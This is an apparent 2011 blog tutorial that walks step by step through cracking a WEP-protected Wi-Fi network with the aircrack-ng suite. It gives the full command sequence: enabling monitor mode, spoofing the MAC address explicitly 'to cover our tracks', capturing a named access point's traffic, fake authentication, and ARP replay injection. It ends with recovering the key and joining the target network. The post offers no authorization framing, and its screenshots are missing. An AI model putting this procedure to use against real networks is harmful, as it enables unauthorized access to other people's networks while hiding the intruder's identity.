Saturday, May 28, 2011

The Art Of Cracking WEP


#Notes-

-->Click On Images To See Them Larger

-->My target AP, output, data, and interfaces may or may not be the same as yours. Replace my command line parameters/info with your own.


Hello, and welcome to my WEP cracking guide. In this guide, I will teach you how to crack WEP implementing Open System authentication. To do this, we will be using a tool, or tool suite, called aircrack-ng. Aircrack-ng has a whole array of tools and scripts to be used for wireless hacking, and every penetration tester should have this in their hacking arsenal. If you don't, be sure to get it at-


http://www.aircrack-ng.org/

I will not go over the entire history of WEP, but let me just say a couple things about it. First of all, WEP stands for Wired Equivalent Privacy. It uses the RC4 stream cipher, so of course the same key can never be used more than once. The key is concatenated with what is called an initialization vector, which forms the key. But, after around 5,000 packets, the key can possibly be repeated. The reason for this is that a 24-bit initialization vector is not long enough to ensure security on a large network, or a network with lots of traffic. We, as the hacker, must prove that this is a big 'ol fuck up, and inform the guilty party to change to WPA (WiFi Protected Access) as soon as possible for the sake of security.

But how do we exploit this vulnerability? We open up a Terminal window, and type-



airmon-ng



Let's look at the output from the above command-


















From this image I am able to see that my interface is wlan0. So now I will start my interface to see which interface monitor mode is enabled on-



airmon-ng start wlan0


Here is the output from this command-
















According to the output, monitor mode is enabled on mon0. We are going to use this interface to put our wireless card into monitor mode, and while we're at it, we are also going to change the mac address for this interface to cover our tracks. To do all of this, just type-


ifconfig mon0 down


Then type-



macchanger --mac 00:11:22:33:44:55 mon0


And finally-


ifconfig mon0 up



Here is what the output of all of these commands will look like-


















As you can see, we have faked our mac address, and we are ready to scan for access points (AP's) on our monitor mode interface. To do this, type-


airodump-ng mon0


Here is the output for this command-

















Let's look at the output. We have found an AP with the network name (ESSID) bightire. It uses WEP for it's encryption/cipher, and since AUTH is blank, it is implementing Open System authentication. It is also on channel 11. But this is just a general scan. Now we have to filter, or "single out" our target AP. To do this, we will specify the details of this AP in airodump-ng-


airodump-ng -c 11 -w wep_crack --bssid 00:23:69:C5:8F:D0 mon0

In this command, we are running airodump-ng and specifying that the AP is on channel 11. We are writing all of our collected data to a file called wep_crack, and specifying the bssid of the AP. And finally, we are doing all of this on the mon0 interface. Here is the output-















LEAVE THIS WINDOW OPEN WITH THE COMMAND RUNNING. We need to collect initialization vectors (#Data), so that we can crack the WEP key. Now we will open a new window (Ctrl-Shift-T) and fake association and authentication with the AP. We are able to do this because the AP implements Open System authentication. After you have your new window open, type-



aireplay-ng -1 0 -a 00:23:69:C5:8F:D0 -e bightire -h 00:11:22:33:44:55 mon0


This is what the output of this command looks like-















Now that we are authenticated and associated, we can replay ARP packets to collect IV's (initialization vectors) a whole lot faster. To do this, type-



aireplay-ng -3 -b 00:23:69:C5:8F:D0 -e bightire -h 00:11:22:33:44:55 mon0

Here is the output from my command, which is right below the previous command-














DO NOT STOP THIS COMMAND.

Now we wait until we have anywhere from 10,000 to half a million IV's (DAMN!). So go do something (this may include smoking a cigarette, drinking a Monster, or going to the bathroom). Come back in a minute.....

Great, your back! Now it's time to crack our WEP key. Open up you third and final Terminal window, and type-


aircrack-ng --bssid 00:23:69:C5:8F:D0 wep_crack-01.cap

Here is my output-














At the bottom of this output, you can clearly see the WEP key, specified by (KEY FOUND!). Inside of the "[ ]" is the WEP key. Remove the colons (:) from it and enter it into you network manager to gain access to your target AP.

Happy Hacking! :-)
Posted by at

1 comment:

  1. UnknownAugust 28, 2012 at 6:30 PM

    give soome explain about all tools and some tips that will be more help to all

    thank you friend

    ReplyDelete

Subscribe to: Post Comments (Atom)